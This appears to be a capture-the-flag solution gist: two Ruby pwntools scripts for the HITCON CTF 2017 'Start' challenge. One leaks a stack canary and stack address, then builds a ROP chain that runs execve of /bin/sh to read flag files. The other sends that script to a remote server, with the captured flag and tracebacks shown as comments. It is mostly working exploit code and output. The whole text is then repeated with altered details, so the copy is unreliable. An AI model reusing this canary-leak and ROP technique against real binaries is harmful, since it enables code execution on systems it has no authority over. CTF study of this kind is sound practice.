Tosainu/exploit.rb

## exploit.rb
require 'pwn'
z = Sock.new '127.0.0.1', 31338
z.send 'A' * 0x19
z.recv 0x18
canary = u64(z.recv 8) & (~0xff)
log.info "canary: #{canary.hex}"
z.recv
z.send 'A' * 0x40
z.recv 0x40
stack = u64((z.recv 6) + '\x00\x00') & 0x00ffffffffffff
log.info "stack: #{stack.hex}"
z.recv
pop_rax_rdx_rbx_ret = 0x0047a6e6
pop_rdi_ret = 0x004005d5
pop_rsi_ret = 0x004017f7
syscall = 0x004003fc
payload = ''
payload += 'A' * 0x18
payload += p64 canary
payload += 'A' * 8
payload += p64 pop_rax_rdx_rbx_ret
payload += p64 59
payload += p64 0
payload += p64 0
payload += p64 pop_rdi_ret
payload += p64 (stack - 0x100 + 0x38)
payload += p64 pop_rsi_ret
payload += p64 (stack - 0x100 + 0x18)
payload += p64 syscall
payload += p64 (stack - 0x100 + 0x38)
payload += p64 (stack - 0x100 + 0x40)
payload += p64 (stack - 0x100 + 0x48)
payload += p64 0
payload += '/bin/sh'.ljust(8, "\x00")
payload += '-c'.ljust(8, "\x00")
payload += 'cat /home/*/flag*'
z.write payload
z.recv
z.sendline 'exit'
loop{puts z.recv}

## exploit2.rb
# HITCON CTF 2017 Quals: Start

require 'pwn'

z = Sock.new '54.65.72.116', 31337

z.recvuntil '> '

z.write File.read('./exploit.rb')

loop {
  puts z.recv
}

# $ bundle exec ruby exploit2.rb
# [INFO] canary: 0xd1b454730f989000
# [INFO] stack: 0x7ffed8f31988
#
# hitcon{thanks_for_using_pwntools-ruby:D}
# server.rb:15:in `eval': EOFError (EOFError)
# 	from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# 	from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# 	from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/timer.rb:54:in `countdown'
# 	from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# 	from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:38:in `recv'
# 	from (eval):42:in `block in <main>'
# 	from (eval):41:in `loop'
# 	from (eval):41:in `<main>'
# 	from server.rb:15:in `eval'
# 	from server.rb:15:in `<main>'
# /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:90:in `rescue in recv_raw': EOFError (EOFError)
# 	from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
# 	from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
# 	from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/timer.rb:54:in `countdown'
# 	from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
# 	from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:38:in `recv'
# 	from exploit2.rb:10:in `block in <main>'
# 	from exploit2.rb:9:in `loop'
# 	from exploit2.rb:9:in `<main>'
	require 'pwn'
	z = Sock.new '127.0.0.1', 31338
	z.send 'A' * 0x19
	z.recv 0x18
	canary = u64(z.recv 8) & (~0xff)
	log.info "canary: #{canary.hex}"
	z.recv
	z.send 'A' * 0x40
	z.recv 0x40
	stack = u64((z.recv 6) + '\x00\x00') & 0x00ffffffffffff
	log.info "stack: #{stack.hex}"
	z.recv
	pop_rax_rdx_rbx_ret = 0x0047a6e6
	pop_rdi_ret = 0x004005d5
	pop_rsi_ret = 0x004017f7
	syscall = 0x004003fc
	payload = ''
	payload += 'A' * 0x18
	payload += p64 canary
	payload += 'A' * 8
	payload += p64 pop_rax_rdx_rbx_ret
	payload += p64 59
	payload += p64 0
	payload += p64 0
	payload += p64 pop_rdi_ret
	payload += p64 (stack - 0x100 + 0x38)
	payload += p64 pop_rsi_ret
	payload += p64 (stack - 0x100 + 0x18)
	payload += p64 syscall
	payload += p64 (stack - 0x100 + 0x38)
	payload += p64 (stack - 0x100 + 0x40)
	payload += p64 (stack - 0x100 + 0x48)
	payload += p64 0
	payload += '/bin/sh'.ljust(8, "\x00")
	payload += '-c'.ljust(8, "\x00")
	payload += 'cat /home//flag'
	z.write payload
	z.recv
	z.sendline 'exit'
	loop{puts z.recv}
	# HITCON CTF 2017 Quals: Start

	require 'pwn'

	z = Sock.new '54.65.72.116', 31337

	z.recvuntil '> '

	z.write File.read('./exploit.rb')

	loop {
	puts z.recv
	}

	# $ bundle exec ruby exploit2.rb
	# [INFO] canary: 0xd1b454730f989000
	# [INFO] stack: 0x7ffed8f31988
	#
	# hitcon{thanks_for_using_pwntools-ruby:D}
	# server.rb:15:in `eval': EOFError (EOFError)
	# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
	# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
	# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/timer.rb:54:in `countdown'
	# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
	# from /home/ruby_server/ruby2.4/lib/ruby/gems/2.4.0/gems/pwntools-1.0.0/lib/pwnlib/tubes/tube.rb:38:in `recv'
	# from (eval):42:in `block in <main>'
	# from (eval):41:in `loop'
	# from (eval):41:in `<main>'
	# from server.rb:15:in `eval'
	# from server.rb:15:in `<main>'
	# /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:90:in `rescue in recv_raw': EOFError (EOFError)
	# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/sock.rb:84:in `recv_raw'
	# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:246:in `block in fillbuffer'
	# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/timer.rb:54:in `countdown'
	# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:244:in `fillbuffer'
	# from /home/cocoa/work/CTF/hitcon-ctf-2017/start/vendor/bundle/ruby/2.4.0/gems/pwntools-1.0.1/lib/pwnlib/tubes/tube.rb:38:in `recv'
	# from exploit2.rb:10:in `block in <main>'
	# from exploit2.rb:9:in `loop'
	# from exploit2.rb:9:in `<main>'